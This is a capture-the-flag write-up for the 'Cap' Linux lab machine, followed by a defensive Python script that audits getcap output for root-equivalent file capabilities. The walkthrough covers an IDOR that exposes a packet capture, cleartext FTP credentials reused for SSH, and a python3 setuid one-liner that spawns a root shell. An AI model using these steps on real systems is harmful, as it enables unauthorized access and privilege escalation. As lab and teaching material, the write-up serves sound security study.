🟢Cap
OS: Linux
Difficulty: Easy
Port Scanning
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack gunicorn
Checking out the website

Now we know that this site is used for network monitoring and that there is a user named Nathan.
Checking out "Security Snapshot"

This option redirects to /data/1, which contains no logged traffic. Changing the id in the URL to /data/0 shows a capture that does contain recorded traffic.

Downloading it gives a file called 0.pcap, which I opened in Wireshark.
User

The capture holds a lot of useful information: HTTP requests from the user to the site and assorted TCP traffic, but the important part is an FTP session. FTP sends credentials in cleartext, so Nathan's username and password for the FTP server are visible in the packets.
Sorting the packets by protocol and scrolling to the end of the capture gives:

user: nathan
password: Buck3tH4TF0RM3!

After logging in to the FTP server with these credentials, the user flag can be downloaded with:
get user.txt
The same credentials also work for SSH (password reuse):
ssh nathan@<box_ip>
password: Buck3tH4TF0RM3!
Privesc
During basic enumeration I noticed that /var/www/html/app.py contains the line os.setuid(1000). That led me to look for binaries with file capabilities, in particular ones allowed to change their own uid (to 0, i.e. root):
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
python3.8 carries cap_setuid in its permitted and effective sets (+eip), so any Python code it runs may call setuid(0) without being root. A one-liner that changes its uid and spawns a shell is enough:
python3 -c 'import os;os.setuid(0);os.system("bash")'
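As an added defender-side example that is not part of the original writeup: a small Python audit that parses getcap -r output in the format shown above and flags binaries whose file capabilities are root-equivalent, marking interpreters because any script they run inherits the capability. The DANGEROUS set and the interpreter pattern are my own choices; the sample input is the listing above.

```python
import re
# Capabilities that amount to root or let a process make itself root (set chosen for this example).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_sys_admin",
             "cap_sys_ptrace", "cap_sys_module", "cap_setfcap", "cap_chown", "cap_fowner"}
# Interpreters run arbitrary user code, so a capability on one is a capability for every user.
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|bash|sh)[\d.]*$")
def parse_getcap_line(line):
    """Parse 'path = caps+eip' (old getcap) or 'path caps=eip' (libcap >= 2.41) into
    (path, {cap: flags}) or None. Flags: e=effective, i=inheritable, p=permitted."""
    line = line.strip()
    if " = " in line:
        path, spec = line.split(" = ", 1)
    elif " " in line:
        path, spec = line.split(" ", 1)
    else:
        return None
    caps = {}
    for group in spec.split():                       # e.g. "cap_net_raw+ep cap_setuid+i"
        m = re.fullmatch(r"([\w,]+)[+=]([eip]*)", group)
        if not m:
            return None
        for cap in m.group(1).split(","):
            caps[cap] = m.group(2)
    return path, caps
def audit(getcap_output):
    """One finding per binary holding a DANGEROUS capability; remediation is setcap -r <path>."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = {c: f for c, f in caps.items() if c in DANGEROUS}
        if risky:
            findings.append({
                "path": path, "caps": risky,
                # permitted + effective together: live at exec, the program need not call capset()
                "active_on_exec": all("p" in f and "e" in f for f in risky.values()),
                "interpreter": bool(INTERPRETER.search(path)),
            })
    return findings
# Constructed sample: the getcap listing from the writeup above.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""
print(audit(SAMPLE))
```

On the listing above it reports only /usr/bin/python3.8 (cap_setuid, active on exec, interpreter); the cap_net_raw and cap_net_bind_service entries are normal and stay quiet.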
